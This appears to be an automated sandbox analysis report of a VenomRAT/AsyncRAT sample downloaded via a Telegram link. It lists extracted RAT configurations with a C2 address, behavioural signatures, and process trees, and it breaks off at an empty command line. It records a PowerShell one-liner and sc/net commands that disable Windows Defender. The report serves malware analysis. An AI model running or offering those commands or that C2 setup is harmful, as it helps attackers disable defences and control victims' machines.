Analysis

max time kernel: 977s
max time network: 994s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 24-12-2024 02:20

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://t.me/RELabDiscussion/30886
Resource: win11-20241007-en

General

Target: https://t.me/RELabDiscussion/30886
Malware Config

Extracted
  Family: asyncrat
  Version: 1.0.7
  Botnet: Default
  C2: 95.216.52.21:7575
  Mutex: xdnqiaxygefjfoolgo
  Attributes:
    delay: 1
    install: false
    install_folder: %AppData%

Extracted
  Family: asyncrat
  Version: Venom RAT + HVNC + Stealer + Grabber v6.0.3
  Botnet: Default
  C2: 127.0.0.1:4449
  Mutex: gavhqcekvoufwwtkygf
  Attributes:
    delay: 1
    install: false
    install_folder: %AppData%
Signatures

Asyncrat family

  Description | IoC | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | powershell.exe

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Description | PID | Process | procid_target
  PID 436 created 688 | 436 | powershell.exe | 7

Async RAT payload (3 IoCs)
  Resource | YARA rule
  behavioral1/files/0x001900000002af94-1384.dat | family_asyncrat
  behavioral1/files/0x001900000002af30-1385.dat | family_asyncrat
  behavioral1/files/0x001900000002afa3-1410.dat | family_asyncrat

Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.

Downloads MZ/PE file

Modifies Windows Firewall (2 TTPs, 2 IoCs)
  PID | Process
  1628 | netsh.exe
  4508 | netsh.exe

Executes dropped EXE (7 IoCs)
  PID | Process
  1452 | tsetup-x64.5.9.0.exe
  2196 | tsetup-x64.5.9.0.tmp
  4744 | Telegram.exe
  5072 | Venom RAT + HVNC + Stealer + Grabber.exe
  2752 | rat.exe
  1732 | rat.exe
  2804 | Client.exe

Loads dropped DLL (1 IoC)
  PID | Process
  4744 | Telegram.exe

Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles (1 TTP, 6 IoCs)
  Description | IoC | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | rat.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | rat.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | rat.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Client.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Client.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Client.exe

Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

  PID | Process
  2420 | powershell.exe

Drops desktop.ini file(s) (1 IoC)
  Description | IoC | Process
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | Telegram.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  Flow | IoC
  112 | discord.com
  126 | discord.com
  4 | discord.com

Looks up external IP address via web service (4 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow | IoC
  1 | ip-api.com
  3 | icanhazip.com
  19 | ip-api.com
  20 | icanhazip.com

Looks up geolocation information via web service
  Uses a legitimate geolocation service to find the infected system's geolocation info.

  PID | Process
  3224 | ARP.EXE

Enumerates processes with tasklist (1 TTP, 1 IoC)
  PID | Process
  756 | tasklist.exe

Launches sc.exe (4 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  PID | Process
  1632 | sc.exe
  4392 | sc.exe
  1588 | sc.exe
  3528 | sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass (1 TTP, 1 IoC)
  When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
  Description | IoC | Process
  File opened for modification | C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe:Zone.Identifier | msedge.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL (1 TTP, 18 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Description | IoC | Process (identical entries collapsed)
  Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe (6 entries)
  Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe (6 entries)
  Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe (6 entries)

Permission Groups Discovery: Local Groups (1 TTP)
  Attempt to find local system groups and permission settings.

System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Description | IoC | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | tsetup-x64.5.9.0.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | tsetup-x64.5.9.0.tmp

System Network Configuration Discovery: Wi-Fi Discovery (1 TTP, 4 IoCs)
  Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
  PID | Process
  1636 | cmd.exe
  4200 | netsh.exe
  2840 | cmd.exe
  1400 | netsh.exe

System Network Connections Discovery (1 TTP, 1 IoC)
  Attempt to get a listing of network connections.
  PID | Process
  2096 | NETSTAT.EXE

Checks processor information in registry (2 TTPs, 4 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Description | IoC | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | rat.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | Client.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Client.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | rat.exe

Collects information from the system (1 TTP, 1 IoC)
  Uses WMIC.exe to find detailed system information.
  PID | Process
  4632 | WMIC.exe

Delays execution with timeout.exe (1 IoC)
  PID | Process
  1372 | timeout.exe

Enumerates system info in registry (2 TTPs, 9 IoCs)
  Description | IoC | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ | Telegram.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Telegram.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | Telegram.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Telegram.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Telegram.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | Telegram.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

Gathers network information (2 TTPs, 2 IoCs)
  Uses commandline utility to view network configuration.
  PID | Process
  3112 | ipconfig.exe
  2096 | NETSTAT.EXE

Gathers system information (1 TTP, 1 IoC)
  Runs systeminfo.exe.
  PID | Process
  3392 | systeminfo.exe

Modifies data under HKEY_USERS (46 IoCs)
Modifies registry class (64 IoCs)
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 575744.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe:Zone.Identifier msedge.exe File created C:\Users\Admin\Downloads\Telegram Desktop\VenomRAT v6.0.3 (+SOURCE).7z:Zone.Identifier Telegram.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4744 Telegram.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1272 msedge.exe 1272 msedge.exe 1468 msedge.exe 1468 msedge.exe 1164 identity_helper.exe 1164 identity_helper.exe 1880 msedge.exe 1880 msedge.exe 3380 msedge.exe 3380 msedge.exe 2196 tsetup-x64.5.9.0.tmp 2196 tsetup-x64.5.9.0.tmp 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 4744 Telegram.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 2752 rat.exe 2804 Client.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3928 7zG.exe Token: 35 3928 7zG.exe Token: SeSecurityPrivilege 3928 7zG.exe Token: SeSecurityPrivilege 3928 7zG.exe Token: SeDebugPrivilege 5072 Venom RAT + HVNC + Stealer + Grabber.exe Token: SeDebugPrivilege 2752 rat.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 1732 rat.exe Token: SeDebugPrivilege 2804 Client.exe Token: SeIncreaseQuotaPrivilege 4632 WMIC.exe Token: SeSecurityPrivilege 4632 WMIC.exe Token: SeTakeOwnershipPrivilege 4632 WMIC.exe Token: SeLoadDriverPrivilege 4632 WMIC.exe Token: 
SeSystemProfilePrivilege 4632 WMIC.exe Token: SeSystemtimePrivilege 4632 WMIC.exe Token: SeProfSingleProcessPrivilege 4632 WMIC.exe Token: SeIncBasePriorityPrivilege 4632 WMIC.exe Token: SeCreatePagefilePrivilege 4632 WMIC.exe Token: SeBackupPrivilege 4632 WMIC.exe Token: SeRestorePrivilege 4632 WMIC.exe Token: SeShutdownPrivilege 4632 WMIC.exe Token: SeDebugPrivilege 4632 WMIC.exe Token: SeSystemEnvironmentPrivilege 4632 WMIC.exe Token: SeRemoteShutdownPrivilege 4632 WMIC.exe Token: SeUndockPrivilege 4632 WMIC.exe Token: SeManageVolumePrivilege 4632 WMIC.exe Token: 33 4632 WMIC.exe Token: 34 4632 WMIC.exe Token: 35 4632 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1468 msedge.exe (64 identical entries) -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 1468 msedge.exe (x12) 4744 Telegram.exe (x7) 5072 Venom RAT + HVNC + Stealer + Grabber.exe (x6) 4744 Telegram.exe (x2) -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4744 Telegram.exe (x2) 5072 Venom RAT + HVNC + Stealer + Grabber.exe (x5) 2752 rat.exe 3920 OpenWith.exe 1732 rat.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 2804 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 1776 1468 msedge.exe 77 (x2) PID 1468 wrote to memory of 3484 1468 msedge.exe 78 (repeated entries) PID 1468 wrote to memory of 1272 1468 msedge.exe 79 (x2) PID 1468 wrote to memory of 3424 1468 msedge.exe 80 (repeated entries; 60 of the 64 entries target PIDs 3484 and 3424) -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Client.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Client.exe
Processes

PID 688  C:\Windows\system32\lsass.exe
  cmdline: C:\Windows\system32\lsass.exe

    PID 2420  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
      - Modifies Windows Defender Real-time Protection settings
      - Command and Scripting Interpreter: PowerShell
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken

        PID 1588  C:\Windows\system32\sc.exe
          cmdline: "C:\Windows\system32\sc.exe" qc windefend
          - Launches sc.exe

        PID 1600  C:\Windows\system32\cmd.exe
          cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"

        PID 4200  C:\Windows\system32\whoami.exe
          cmdline: "C:\Windows\system32\whoami.exe" /groups
          - Suspicious use of AdjustPrivilegeToken

        PID 2996  C:\Windows\system32\net1.exe
          cmdline: "C:\Windows\system32\net1.exe" stop windefend

        PID 3528  C:\Windows\system32\sc.exe
          cmdline: "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
          - Launches sc.exe

PID 1468  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://t.me/RELabDiscussion/30886
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

    PID 1776  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff882223cb8,0x7ff882223cc8,0x7ff882223cd8

    PID 3484  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2

    PID 1272  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    PID 3424  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8

    PID 2908  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

    PID 2300  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

    PID 3852  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1

    PID 2872  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1

    PID 4136  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1

    PID 1164  C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    PID 1880  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    PID 1012  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

    PID 4012  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1

    PID 1860  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1

    PID 3136  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1

    PID 1420  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5996 /prefetch:8

    PID 3380  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:8
      - Subvert Trust Controls: Mark-of-the-Web Bypass
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses

    PID 1452  C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe
      cmdline: "C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery

        PID 2196  C:\Users\Admin\AppData\Local\Temp\is-8MOCR.tmp\tsetup-x64.5.9.0.tmp
          cmdline: "C:\Users\Admin\AppData\Local\Temp\is-8MOCR.tmp\tsetup-x64.5.9.0.tmp" /SL5="$D007C,45613588,827904,C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses

            PID 4744  C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
              cmdline: "C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Drops desktop.ini file(s)
              - Enumerates system info in registry
              - Modifies registry class
              - NTFS ADS
              - Suspicious behavior: AddClipboardFormatListener
              - Suspicious behavior: GetForegroundWindowSpam
              - Suspicious use of SendNotifyMessage
              - Suspicious use of SetWindowsHookEx

PID 5044  C:\Windows\System32\CompPkgSrv.exe
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

PID 3096  C:\Windows\System32\CompPkgSrv.exe
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

PID 4812  C:\Windows\System32\rundll32.exe
  cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

PID 3928  C:\Program Files\7-Zip\7zG.exe
  cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\" -ad -an -ai#7zMap13745:110:7zEvent13979
  - Suspicious use of AdjustPrivilegeToken

PID 5072  C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Venom RAT + HVNC + Stealer + Grabber.exe
  cmdline: "C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Venom RAT + HVNC + Stealer + Grabber.exe"
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx

    PID 3056  C:\Windows\explorer.exe
      cmdline: "C:\Windows\explorer.exe" C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\ClientsFolder\127.0.0.1\Information\Information.txt

PID 2920  C:\Windows\system32\wbem\WmiApSrv.exe
  cmdline: C:\Windows\system32\wbem\WmiApSrv.exe

PID 2752  C:\Users\Admin\Downloads\rat.exe
  cmdline: "C:\Users\Admin\Downloads\rat.exe"
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx

    PID 436  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline (multi-line):
